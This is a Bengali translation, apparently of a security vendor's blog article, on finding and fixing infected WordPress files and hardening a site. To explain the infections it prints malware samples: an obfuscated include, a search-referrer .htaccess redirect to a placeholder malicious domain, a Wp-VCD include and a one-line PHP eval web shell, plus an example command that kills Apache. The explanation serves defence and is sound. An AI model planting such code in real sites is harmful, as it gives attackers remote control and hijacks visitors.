কম্পিউটার

কিভাবে সংক্রমিত ওয়ার্ডপ্রেস ফাইলগুলি (wp-config.php এবং wp-content/uploads) স্ক্যান ও ফিক্স করবেন

ওয়ার্ডপ্রেস ওয়েবসাইট নির্মাণকে অত্যন্ত সহজ করে তুলেছে এবং যেকোন আকারের ব্যক্তি ও প্রতিষ্ঠানকে অনলাইনে উপস্থিতির জন্য সক্ষম করেছে।

আপনার ওয়ার্ডপ্রেস ওয়েবসাইট হোস্ট করার সময়, এর নিরাপত্তার যত্ন নেওয়া অপরিহার্য। আপনি শেষ যে জিনিসটি ঘটাতে চান তা হল সকালে ঘুম থেকে উঠে দেখুন আপনার ওয়েবসাইট হ্যাক হয়েছে এবং আপনার সমস্ত বিকাশ এবং এসইও প্রচেষ্টা ভেস্তে গেছে এবং আপনার কোন জ্ঞান নেই 🙁

এর জনপ্রিয়তার কারণে, হ্যাকাররা এর থিম এবং প্লাগইন সহ ওয়ার্ডপ্রেসকে টার্গেট করে। যদি তারা একটি প্লাগইনে একটি দুর্বলতা খুঁজে পায়, তাহলে তারা সহজেই সেই প্লাগইন ইনস্টল থাকা প্রায় সমস্ত ওয়েবসাইটকে কাজে লাগাতে পারবে৷

সম্পর্কিত নির্দেশিকা – WordPress ম্যালওয়্যার অপসারণ

একটি উদাহরণ হিসাবে পরিচিতি ফর্ম 7 প্লাগইনের সাম্প্রতিক দুর্বলতা নিন। এটি অনুমান করা হয় যে যোগাযোগ ফর্ম ওয়ার্ডপ্রেস প্লাগইন ব্যবহার করে 5 মিলিয়নেরও বেশি ওয়েবসাইটগুলি দুর্বলতা প্রকাশের পরে দুর্বল হয়ে পড়েছিল৷ প্লাগইনগুলির ত্রুটিগুলি আক্রমণকারীদেরকে একটি ওয়েবসাইটে অনুমোদিত আপলোড-সক্ষম ফাইলের ধরন সম্পর্কিত সমস্ত বিধিনিষেধ উপেক্ষা করে যে কোনও ধরণের ফাইল আপলোড করার অনুমতি দেয়৷ আরও, এটি একটি আক্রমণকারীকে দূষিত বিষয়বস্তু যেমন ওয়েব শেলকে ইনজেক্ট করার অনুমতি দেয় যে সাইটগুলিতে যোগাযোগ ফর্ম 7 প্লাগইন সংস্করণটি 5.3.1 এর নিচে ব্যবহার করা হয় এবং ফর্মগুলিতে ফাইল আপলোড সক্ষম করা আছে৷

একইভাবে, 'স্লাইডার বিপ্লব' প্লাগইনে একটি LFI দুর্বলতা ছিল যা হ্যাকারদের জন্য wp-config.php ডাউনলোড করা সম্ভব করেছিল দুর্বল ওয়ার্ডপ্রেস সাইট থেকে। এটি একটি ওয়েবসাইট সম্পর্কে ডেটাবেস শংসাপত্র, এনক্রিপশন কী এবং অন্যান্য সংবেদনশীল কনফিগারেশন তথ্য ফাঁসের দিকে পরিচালিত করে। এটি wp-config.php হ্যাক হিসাবে উল্লেখ করা শুরু হয়েছে।

এই নির্দেশিকায়, আমরা আপনার ওয়ার্ডপ্রেস সাইটের সমস্ত গুরুত্বপূর্ণ ফাইল এবং অবস্থান সম্পর্কে কথা বলব যেগুলি হ্যাকার এবং ম্যালওয়্যারের লক্ষ্য হতে পারে৷

1) WordPress wp-config.php হ্যাক

wp-config.php প্রতিটি WP ইনস্টলেশনের জন্য একটি গুরুত্বপূর্ণ ফাইল। এটি সাইট দ্বারা ব্যবহৃত কনফিগারেশন ফাইল এবং WP ফাইল সিস্টেম এবং ডাটাবেসের মধ্যে সেতু হিসাবে কাজ করে। wp-config.php ফাইলটিতে সংবেদনশীল তথ্য রয়েছে যেমন:

  • ডাটাবেস হোস্ট
  • ব্যবহারকারীর নাম, পাসওয়ার্ড এবং পোর্ট নম্বর
  • ডাটাবেসের নাম
  • ওয়ার্ডপ্রেসের জন্য নিরাপত্তা কী
  • ডাটাবেস টেবিল উপসর্গ

সম্পর্কিত নির্দেশিকা – ওয়ার্ডপ্রেস নিরাপত্তার জন্য ধাপে ধাপে সম্পূর্ণ নির্দেশিকা (হ্যাক হওয়ার ঝুঁকি 90% কমিয়ে দিন)

এর সংবেদনশীল প্রকৃতির কারণে, এটি হ্যাকারদের মধ্যে একটি জনপ্রিয় লক্ষ্য। গত বছর, WP প্লাগইন ডুপ্লিকেটর-এ একটি গুরুতর ত্রুটি পাওয়া গেছে . সেখানে অপ্রমাণিত আরবিট্রারি ফাইল ডাউনলোড ছিল৷ দুর্বলতা যা হ্যাকারদের wp-config ফাইল ডাউনলোড করতে দেয়।

একবার হ্যাকাররা wp-config.php এর মাধ্যমে ডাটাবেসের লগইন বিশদটি ধরে ফেলে হ্যাক, তারা ডাটাবেসের সাথে সংযোগ করার চেষ্টা করে এবং নিজেদের জন্য জাল WP অ্যাডমিন অ্যাকাউন্ট তৈরি করে। এটি তাদের একটি ওয়েবসাইট এবং ডাটাবেসে সম্পূর্ণ অ্যাক্সেস দেয়। সংবেদনশীল ডেটা যেমন — ব্যবহারকারীর পাসওয়ার্ড, ইমেল আইডি, ফাইল, ছবি, WooCommerce লেনদেনের বিশদ, এবং আরও অনেক কিছু হ্যাকারের কাছে উন্মুক্ত হয়। আপনার ওয়ার্ডপ্রেস সাইটে অবিরত অ্যাক্সেস পেতে, তারা ফাইলসম্যান ব্যাকডোরের মতো স্ক্রিপ্ট ইনস্টল করতে পারে।

কিভাবে সংক্রমিত ওয়ার্ডপ্রেস ফাইলগুলি (wp-config.php এবং wp-content/uploads) স্ক্যান ও ফিক্স করবেন

2) WordPress index.php হ্যাক করা হয়েছে

index.php ফাইল হল প্রতিটি ওয়ার্ডপ্রেস সাইটের এন্ট্রি পয়েন্ট। যেহেতু এটি আপনার সাইটের প্রতিটি পৃষ্ঠার সাথে চলতে পারে, তাই হ্যাকাররা ক্ষতিকারক কোড ইনজেক্ট করে যা আপনার পুরো ওয়েবসাইটকে প্রভাবিত করে৷

উদাহরণস্বরূপ, pub2srv ম্যালওয়্যার এবং ফেভিকন ম্যালওয়্যার হ্যাক লক্ষ্য index.php ফাইলগুলি অ্যাস্ট্রা সিকিউরিটির গবেষকরা এই বৃহৎ স্প্রেড ম্যালওয়্যার পুনঃনির্দেশ প্রচারাভিযান পর্যবেক্ষণ করছিলেন, এবং দেখেছিলেন যে দূষিত কোড যেমন @include "\x2f/sgb\x2ffavi\x63on_5\x34e6ed\x2eico"; এবং নীচের স্ক্রিনশটের কোডটি index.php ফাইলগুলিতে যোগ করা হয়েছে:

কিভাবে সংক্রমিত ওয়ার্ডপ্রেস ফাইলগুলি (wp-config.php এবং wp-content/uploads) স্ক্যান ও ফিক্স করবেন

কিছু ম্যালওয়্যার প্রচারাভিযানও index.php এর নাম পরিবর্তন করে index.php.bak ফাইল করুন এবং ওয়েবসাইটটি ক্র্যাশ করেছে এবং লোড হয়নি।

index.php-এ এই ধরনের দূষিত কোড ফাইলের কারণে ওয়েবসাইট দর্শকদের অদ্ভুত পপআপ, বিজ্ঞাপন বা এমনকি অন্য স্প্যামি সাইটে পুনঃনির্দেশিত হতে পারে। এই ধরনের একটি হ্যাক ঠিক করতে, এই ফাইলের বিষয়বস্তু ওয়ার্ডপ্রেস দ্বারা প্রকাশিত মূল কপির সাথে তুলনা করুন৷

সম্পর্কিত নির্দেশিকা – চূড়ান্ত ওয়ার্ডপ্রেস হ্যাক অপসারণ নির্দেশিকা

3) WordPress .htaccess ফাইল হ্যাক করা হয়েছে

.htaccess ফাইল প্রায়ই আপনার ওয়ার্ডপ্রেস ওয়েবসাইটের হোম অবস্থানে পাওয়া যায়, ওয়েবসাইটের প্রয়োজন অনুযায়ী সার্ভার সেটিংস কনফিগার করতে সাহায্য করে। এটি প্রায়ই Apache সার্ভারে পাওয়া যায়। .htaccess ফাইল আপনার ওয়েব সার্ভারের কর্মক্ষমতা এবং আচরণ নিয়ন্ত্রণ করার জন্য একটি অত্যন্ত শক্তিশালী উপাদান। এটি আপনার ওয়েবসাইটের নিরাপত্তা নিয়ন্ত্রণ করতেও ব্যবহার করা যেতে পারে। .htaccess এর কিছু সাধারণ ব্যবহার ফাইল হল:

  • সাইটের নির্দিষ্ট ফোল্ডারগুলিতে অ্যাক্সেস সীমাবদ্ধ করুন
  • সাইটের সর্বোচ্চ মেমরি ব্যবহার কনফিগার করুন
  • পুনঃনির্দেশ তৈরি করুন
  • HTTPS বল করুন
  • ক্যাশিং পরিচালনা করুন
  • কিছু ​​স্ক্রিপ্ট ইনজেকশন আক্রমণ প্রতিরোধ করুন
  • সর্বাধিক ফাইল আপলোডের আকার নিয়ন্ত্রণ করুন
  • বটগুলিকে ব্যবহারকারীর নাম খুঁজে পাওয়া বন্ধ করুন
  • ইমেজ হটলিংক ব্লক করুন
  • ফাইল স্বয়ংক্রিয়ভাবে ডাউনলোড করতে বাধ্য করুন
  • ফাইল এক্সটেনশন পরিচালনা করুন

যাইহোক, আক্রমণের সময়, এই বৈশিষ্ট্যগুলি আক্রমণকারীর জন্য ক্লিক সংগ্রহ করতে ব্যবহার করা যেতে পারে। প্রায়ই, .htaccess ফাইল ব্যবহারকারীদের পুনঃনির্দেশিত করার জন্য দূষিত কোড দিয়ে ইনজেকশন করা হয়। কখনও কখনও এটি ব্যবহারকারীদের কাছে স্প্যাম প্রদর্শন করতে ব্যবহৃত হয়। উদাহরণস্বরূপ নীচে দেওয়া কোডটি দেখুন:

RewriteEngine On
 RewriteOptions inherit
 RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
 RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
 RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
 RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
 RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
 RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
 RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
 RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
 RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
 RewriteRule .* https://MaliciousDomain.tld/bad.php?t=3 [R,L]

শেষ লাইনের ক্ষতিকারক কোডটি সাইট থেকে ব্যবহারকারীর ট্রাফিককে পুনঃনির্দেশ করছে। ফলস্বরূপ, ব্যবহারকারীদের https://MaliciousDomain.tld এ পুনঃনির্দেশিত করা হয় . তারপর, এটি bad.php লোড করার চেষ্টা করে লিপি. আপনি যদি আপনার সাইট থেকে অস্বাভাবিক পুনঃনির্দেশ লক্ষ্য করেন, তাহলে এটি .htaccess এর কারণে সম্ভব ফাইল হ্যাক। যাইহোক, যদি আপনি ফাইলটি খুঁজে না পান, অথবা যদি এটি খালি থাকে - আতঙ্কিত হবেন না কারণ এই ফাইলটি বাধ্যতামূলক নয় (যদি না আপনি ওয়ার্ডপ্রেসে সুন্দর ইউআরএল ব্যবহার করছেন)।

প্রতিটি ওয়ার্ডপ্রেস থিমে footer.php নামে একটি ফাইল থাকে এবং header.php যেটিতে সাইটের ফুটার এবং হেডারের কোড রয়েছে। এই এলাকায় স্ক্রিপ্ট এবং কিছু উইজেট রয়েছে যা ওয়েবসাইট জুড়ে একই থাকে। উদাহরণস্বরূপ, শেয়ার উইজেট বা আপনার ওয়েবসাইটের নীচে সোশ্যাল মিডিয়া উইজেট। অথবা কখনও কখনও এটি শুধুমাত্র কপিরাইট তথ্য, ক্রেডিট, ইত্যাদি হতে পারে।

সুতরাং, এই দুটি ফাইল গুরুত্বপূর্ণ ফাইল যা আক্রমণকারীদের দ্বারা লক্ষ্যবস্তু হতে পারে। এটি প্রায়শই ম্যালওয়্যার পুনঃনির্দেশ এবং স্প্যাম সামগ্রী প্রদর্শনের জন্য ব্যবহৃত হয় যেমনটি ছিল ডাইজেস্টকোলেক্ট [.com] ম্যালওয়্যার পুনঃনির্দেশ করুন .

হ্যাক করা সাইটগুলিতে এই ফাইলগুলিতে অপ্রীতিকর কোড থাকতে পারে যেমন আপনি নীচের স্ক্রিনশটে দেখতে পাচ্ছেন:

কিভাবে সংক্রমিত ওয়ার্ডপ্রেস ফাইলগুলি (wp-config.php এবং wp-content/uploads) স্ক্যান ও ফিক্স করবেন

আমরা এর কিছু ডিকোড করেছি এবং ব্যবহারকারীদের সনাক্ত করতে এবং তাদের দূষিত বিজ্ঞাপন ইত্যাদি দেখানোর জন্য হ্যাকারদের ব্রাউজার কুকিজ ব্যবহার করতে পেরেছি৷

তদুপরি, অন্য একটি উদাহরণে, আক্রমণকারীরা একটি .js এক্সটেনশন সহ সমস্ত ফাইলে জাভাস্ক্রিপ্ট কোড ইনজেক্ট করে। বড় আকারের সংক্রমণের কারণে, এই ধরনের হ্যাকগুলি পরিষ্কার করা প্রায়শই কঠিন হয়ে পড়ে।

কিভাবে সংক্রমিত ওয়ার্ডপ্রেস ফাইলগুলি (wp-config.php এবং wp-content/uploads) স্ক্যান ও ফিক্স করবেন

5) WordPress functions.php হ্যাকড

থিম ফোল্ডারের মধ্যে ফাংশন ফাইল একটি প্লাগইন হিসাবে আচরণ করবে. যার অর্থ, এটি ওয়ার্ডপ্রেস সাইটে অতিরিক্ত বৈশিষ্ট্য এবং কার্যকারিতা যোগ করতে ব্যবহার করা যেতে পারে। ফাইল functions.php এর জন্য ব্যবহার করা যেতে পারে:

  • ওয়ার্ডপ্রেস ইভেন্ট/ফাংশন কল করা
  • নেটিভ পিএইচপি ফাংশন কল করতে।
  • অথবা আপনার নিজস্ব ফাংশন সংজ্ঞায়িত করতে।

functions.php ফাইল প্রতিটি থিমের সাথে উপস্থিত থাকে, তবে এটি মনে রাখা গুরুত্বপূর্ণ যে যেকোন সময়ে, শুধুমাত্র একটি functions.php ফাইলটি কার্যকর করা হয় - সক্রিয় থিমের মধ্যে একটি। এই কারণে, functions.php ফাইলগুলি Wp-VCD ব্যাকডোর হ্যাকের আক্রমণকারীদের দ্বারা সক্রিয়ভাবে লক্ষ্যবস্তু ছিল৷ এই ম্যালওয়্যারটি নতুন প্রশাসক তৈরি করেছে এবং ফার্মা এবং জাপানিজ এসইও স্প্যামের মতো সাইটে স্প্যাম পৃষ্ঠাগুলিকে ইনজেক্ট করেছে৷

<?php if (file_exists(dirname(__FILE__) . '/class.theme-modules.php')) include_once(dirname(__FILE__) . '/class.theme-modules.php'); ?>

উপরের কোড থেকে স্পষ্ট, এই ফাইলটিতে class.theme-modules.php অন্তর্ভুক্ত রয়েছে ফাইল এই ফাইলটি আপনার সাইটে ইনস্টল করা অন্যান্য থিমগুলিতে ম্যালওয়্যার ইনস্টল করতে ব্যবহার করা হয় (এমনকি যদি সেগুলি অক্ষম করা হয়)। এইভাবে নতুন ব্যবহারকারী এবং backdoors তৈরি. এটি আক্রমণকারীদের ফাইল পরিষ্কার করার পরেও সাইটটি অ্যাক্সেস করার অনুমতি দেয়৷

6) WordPress wp-load.php হ্যাক করা হয়েছে

wp-load.php প্রতিটি ওয়ার্ডপ্রেস সাইটের জন্য একটি গুরুত্বপূর্ণ ফাইল। wp-load.php ফাইল ওয়ার্ডপ্রেস এনভায়রনমেন্ট বুটস্ট্র্যাপিং করতে সাহায্য করে এবং প্লাগইনগুলিকে নেটিভ WP কোর ফাংশন ব্যবহার করার ক্ষমতা দেয়। অনেক ম্যালওয়্যার ভেরিয়েন্ট ওয়ার্ডপ্রেস সাইটগুলিকে ক্ষতিকারক ডব্লিউপি-লোড ফাইল তৈরি করে সংক্রমিত করে যেমনটি চায়না চপার ওয়েব শেল ম্যালওয়্যারের ক্ষেত্রে দেখা গেছে। এই সাধারণ আচরণটি ছিল wp-load-eFtAh.php এর মতো ফাইল তৈরি করা সার্ভারে যেহেতু নামটি আসল ফাইলের নামের সাথে সাদৃশ্যপূর্ণ, তাই আপনি FTP-তে লগ ইন করার সময় এটিকে সন্দেহজনক নাও পেতে পারেন। এই ফাইলগুলিতে কোড থাকবে যেমন:

<?php /*5b7bdc250b181*/ ?><?php @eval($_POST['pass']);?>

এই কোডটি আক্রমণকারীকে pass-এ হ্যাকারদের দ্বারা প্রেরিত সাইটে যেকোনো PHP কোড চালানোর অনুমতি দেয়। প্যারামিটার এই ব্যাকডোর ব্যবহার করে, ক্ষতিকারক কমান্ড কার্যকর করা যেতে পারে। উদাহরণস্বরূপ, কমান্ড — https://yoursite/your.php?pass=system("killall -9 apache"); ওয়েব সার্ভার প্রসেস মেরে ফেলতে পারে। এটি সম্পূর্ণ সার্ভার বন্ধ করতে পারে। এই কোডটিকে এর দৈর্ঘ্য দ্বারা বিচার করবেন না - এটি আপনার সার্ভারকে দূরবর্তীভাবে নিয়ন্ত্রণ করা যথেষ্ট বিপজ্জনক৷

7) সার্ভারে class-wp-cache.php ফাইলের বন্যা

সাম্প্রতিক হ্যাকগুলির মধ্যে একটিতে, আমরা দেখেছি যে cPanel এবং সমগ্র ওয়েব সার্ভার ডজন বা হাজার হাজার class-wp-cache.php পাচ্ছে নথি পত্র. মূল ফাইল সহ ওয়েবসাইটের প্রতিটি ফোল্ডার এই দূষিত ফাইল দ্বারা সংক্রমিত হয়. সাধারণত, এই সংক্রমণের কারণ হল ওয়েবসাইট কোডের একটি দুর্বলতা যা হ্যাকারদের জন্য একটি ইনলেট খুলে দেয়।

কীভাবে একটি ওয়ার্ডপ্রেস ফাইল ক্লিনআপ ও সুরক্ষিত করবেন

1) ফাইল পরিষ্কার করা

প্রথমত, wp-config.php হ্যাক এর মত আক্রমণের কারণ অনুসন্ধান করুন। তারপর দূষিত/বিবেকহীন কোড সরান। দ্বিতীয়ত, আপনার কাছে থাকতে পারে এমন একটি ব্যাকআপ থেকে সংক্রামিত ফাইলগুলি পুনরুদ্ধার করুন। ব্যাকআপ অনুপলব্ধ হলে আপনি GitHub-এ আসল ওয়ার্ডপ্রেস ফাইলগুলি পরীক্ষা করে দেখতে পারেন। আপনি কোনো পরিবর্তন করার আগে ফাইলগুলির একটি ব্যাকআপ রাখতে ভুলবেন না। কোড অপসারণ প্রক্রিয়ায় যেকোন ভুল হলে আপনার সাইটটি নষ্ট হয়ে যেতে পারে।

2) প্লাগইন ব্যবহার করে সাইট সুরক্ষিত করা

এই ধরনের হ্যাকগুলির সাহায্যে, মূল CMS ফাইলগুলি প্রায়ই হ্যাকারদের দ্বারা পরিবর্তিত হয়। আপনার মূল ওয়ার্ডপ্রেস ফাইলগুলির মধ্যে কোন পরিবর্তন করা হয়েছে কিনা তা পরীক্ষা করা গুরুত্বপূর্ণ। অ্যাস্ট্রা সিকিউরিটি গ্রাহকদের কাছে ইতিমধ্যেই এই বৈশিষ্ট্যটি রয়েছে এবং এই ধরনের কোনো পরিবর্তন শনাক্ত হলে স্বয়ংক্রিয়ভাবে সূচিত হয়৷

কিভাবে সংক্রমিত ওয়ার্ডপ্রেস ফাইলগুলি (wp-config.php এবং wp-content/uploads) স্ক্যান ও ফিক্স করবেন

অ্যাস্ট্রা সিকিউরিটি এই ফাইলগুলির পরিবর্তনগুলি পর্যালোচনা করার জন্য একটি অন্তর্নির্মিত পর্যালোচনা পদ্ধতিও সরবরাহ করে৷

কিভাবে সংক্রমিত ওয়ার্ডপ্রেস ফাইলগুলি (wp-config.php এবং wp-content/uploads) স্ক্যান ও ফিক্স করবেন

আপনি মূল সিস্টেম ফাইলগুলির পরিবর্তনগুলি পর্যালোচনা করার পরে, আপনাকে একটি ম্যালওয়্যার স্ক্যানিং সমাধান যেমন Astra ওয়েবসাইট সুরক্ষা দিয়ে আপনার সাইট স্ক্যান করতে হবে যাতে ক্ষতিকারক সামগ্রী রয়েছে এমন ফাইলগুলি সনাক্ত করতে৷ এই ধরনের টুলগুলি আপনাকে ম্যালওয়্যার ফাইল, ক্ষতিকারক লিঙ্ক, হ্যাক হওয়ার কারণ ইত্যাদির সম্পূর্ণ স্ক্যান রিপোর্ট দেয়৷

3) সংবেদনশীল ফাইল লুকান

চোখের সামনে ফাইলগুলি প্রকাশ করা সংবেদনশীল তথ্য প্রকাশ করতে পারে যেমন আমরা wp-config.php সম্পর্কে বলেছি এই নিবন্ধে হ্যাক. অতএব, সার্ভারে এই ফাইলগুলি লুকিয়ে রাখা প্রয়োজন। .htaccess ফাইল এই ফাইলগুলি সুরক্ষিত করতে সাহায্য করতে পারে৷

wp-content/uploads-এ যেকোনও পিএইচপি ফাইল অ্যাক্সেস করা থেকে কাউকে আটকাতে ফোল্ডার, আপনি একটি .htaccess তৈরি করতে পারেন wp-content/uploads-এ ফাইল ফোল্ডার এবং এটিতে নিম্নলিখিত কোড যোগ করুন:

# Kill PHP Execution
<Files ~ ".ph(?:p[345]?|t|tml)$">
deny from all
</Files>

wp-includes-এ সংবেদনশীল ফাইল লুকানোর জন্য ফোল্ডার, .htaccess-এ নিম্নলিখিত কোড যোগ করুন আপনার সাইটের রুটে ফাইল:

# Block wp-includes folder and files
 <IfModule mod_rewrite.c>
 RewriteEngine On
 RewriteBase /
 RewriteRule ^wp-admin/includes/ - [F,L]
 RewriteRule !^wp-includes/ - [S=3]
 RewriteRule ^wp-includes/[^/]+\.php$ - [F,L]
 RewriteRule ^wp-includes/js/tinymce/langs/.+\.php - [F,L]
 RewriteRule ^wp-includes/theme-compat/ - [F,L]
 </IfModule>

আপনি এই সম্পূর্ণ প্রক্রিয়াটি এড়িয়ে যেতে এবং শুধু WP হার্ডেনিং প্লাগইন ইনস্টল করতে পারেন। এই প্লাগইনটি সংবেদনশীল ফাইল যেমন wp-contents, wp-uploads ইত্যাদি লুকিয়ে রাখে শুধুমাত্র একটি বোতামের টগল দিয়ে। এই WP-হার্ডেনিং-এ যোগ করা আপনার ওয়েবসাইটের অন্যান্য গুরুত্বপূর্ণ নিরাপত্তা ক্ষেত্রগুলিকে সুরক্ষিত করতেও সাহায্য করে, যা আক্রমণকারীদের পক্ষে সংবেদনশীল তথ্য শনাক্ত করা এবং এটি ব্যবহার করা কঠিন করে তোলে।

সম্পর্কিত নির্দেশিকা – ওয়ার্ডপ্রেস ম্যালওয়্যার অপসারণের জন্য ধাপে ধাপে নির্দেশিকা

4) ওয়ার্ডপ্রেস আপডেট করা

সর্বদা আপনার WP ইনস্টলেশন, এর প্লাগইন এবং থিম আপ টু ডেট রাখুন। একটি হালনাগাদ ইনস্টলেশন চালানোর মাধ্যমে একটি ভাল সংখ্যক ত্রুটিগুলি প্লাগ করা যেতে পারে৷ শুধুমাত্র নামী প্লাগইন এবং থিম ব্যবহার করুন. খারাপভাবে কোডেড বা বাতিল থিম এড়িয়ে চলুন। এটি wp-config.php এর মতো আক্রমণগুলিকে রাখবে৷ হ্যাক এট বে।

এটি আরও ভালভাবে ব্যাখ্যা করার জন্য, আমরা আপনার ওয়ার্ডপ্রেস সাইটকে সুরক্ষিত করার জন্য একটি সম্পূর্ণ ধাপে ধাপে ভিডিও তৈরি করেছি:

5) একটি ওয়ার্ডপ্রেস ফায়ারওয়াল ব্যবহার করুন

একটি ফায়ারওয়াল আপনার সাইটকে সুরক্ষিত করতে অনেক দূর এগিয়ে যায়। একটি ফায়ারওয়াল আপনার সাইটে আগত ট্র্যাফিক নিরীক্ষণ করতে পারে এবং সংক্রমণ ব্লক করতে প্রতিরোধমূলক ব্যবস্থা নিতে পারে। এটি কার্যকরভাবে wp-config.php এর মতো আক্রমণ প্রতিরোধ করতে পারে টাট্টু. বর্তমানে বাজারে একাধিক সাশ্রয়ী ফায়ারওয়াল সমাধান পাওয়া যাচ্ছে। Astra সিকিউরিটির একটি নমনীয় এবং আপনার প্রয়োজনের জন্য উপযুক্ত।

কিভাবে সংক্রমিত ওয়ার্ডপ্রেস ফাইলগুলি (wp-config.php এবং wp-content/uploads) স্ক্যান ও ফিক্স করবেন

অ্যাস্ট্রা ফায়ারওয়াল রিয়েল-টাইমে SQLi, কোড ইনজেকশন, XSS, CSRF এবং 100+ অন্যান্য সাইবার হুমকির মতো আক্রমণ বন্ধ করে। এটি আপনার উদাহরণে অস্বাভাবিক এবং জাল লগইনগুলি সনাক্ত করে এবং ব্লক করে এবং স্বয়ংক্রিয়ভাবে এবং নিয়মিতভাবে আপনার ওয়েবসাইট স্ক্যান করে৷

6) ওয়ার্ডপ্রেস সিকিউরিটি অডিট বা পেন টেস্টিং

ওয়ার্ডপ্রেস ব্যবহারে সর্বাধিক জনপ্রিয় সিএমএস হওয়ায় এবং এইভাবে বর্ধিত নিরাপত্তা সমস্যাগুলির জন্য একটি জায়গা, আক্রমণকারীরা সবসময় ওয়ার্ডপ্রেস ওয়েবসাইটগুলিতে শোষণযোগ্য দুর্বলতার জন্য অনুসন্ধানে থাকে। ফলস্বরূপ, একটি ওয়ার্ডপ্রেস সাইটকে আক্রমণ থেকে সুরক্ষিত রাখার জন্য পেন-টেস্টিং অপরিহার্য হয়ে উঠেছে।

পেনিট্রেশন টেস্টিং হল একটি সিমুলেটেড আক্রমণ যা একটি ওয়েব অ্যাপ্লিকেশন, নেটওয়ার্ক বা কম্পিউটার সিস্টেমের বিরুদ্ধে সঞ্চালিত হয় যাতে এর নিরাপত্তা মূল্যায়ন করা হয় এবং আক্রমণকারীর আগে এটির যে কোনো দুর্বলতা খুঁজে বের করার জন্য এটিকে রক্ষা করতে সাহায্য করে। একটি ওয়ার্ডপ্রেস সাইটে পেন-টেস্টিং করার সময় বিভিন্ন সিমুলেটেড আক্রমণের মধ্যে একটি হল ডিরেক্টরি তালিকার দুর্বলতা পরীক্ষা করা যা মূলত সংবেদনশীল ডিরেক্টরি যেমন wp-includes, wp-index.php, wp-config.php, wp-admin, wp-load.php, wp-content, ইত্যাদি এবং এইভাবে আক্রমণকারীকে সংবেদনশীল তথ্য প্রদান করতে পারে।

আমাদের ফ্রি WP হার্ডেনিং প্লাগইন ব্যবহার করে একটি ক্লিকের মাধ্যমে 12+ নিরাপত্তা সমস্যা সমাধান করুন

কিভাবে সংক্রমিত ওয়ার্ডপ্রেস ফাইলগুলি (wp-config.php এবং wp-content/uploads) স্ক্যান ও ফিক্স করবেন

সম্পর্কিত নির্দেশিকা – ওয়ার্ডপ্রেস নিরাপত্তার জন্য ধাপে ধাপে সম্পূর্ণ নির্দেশিকা (হ্যাক হওয়ার ঝুঁকি 90% কমিয়ে দিন)


  1. কিভাবে প্লাগইনগুলিতে ওয়ার্ডপ্রেস পিএইচপি এক্সিকিউশন লুকানো ম্যালওয়্যার ঠিক করবেন

  2. Windows 10-এ দুর্নীতিগ্রস্ত ফাইলগুলি কীভাবে ঠিক করবেন এবং সেগুলি অ্যাক্সেস করবেন?

  3. কীভাবে দূষিত ভিডিও ফাইলগুলি ঠিক করবেন

  4. কিভাবে উইন্ডোজ 11 মেরামত করবেন এবং দূষিত ফাইলগুলি ঠিক করবেন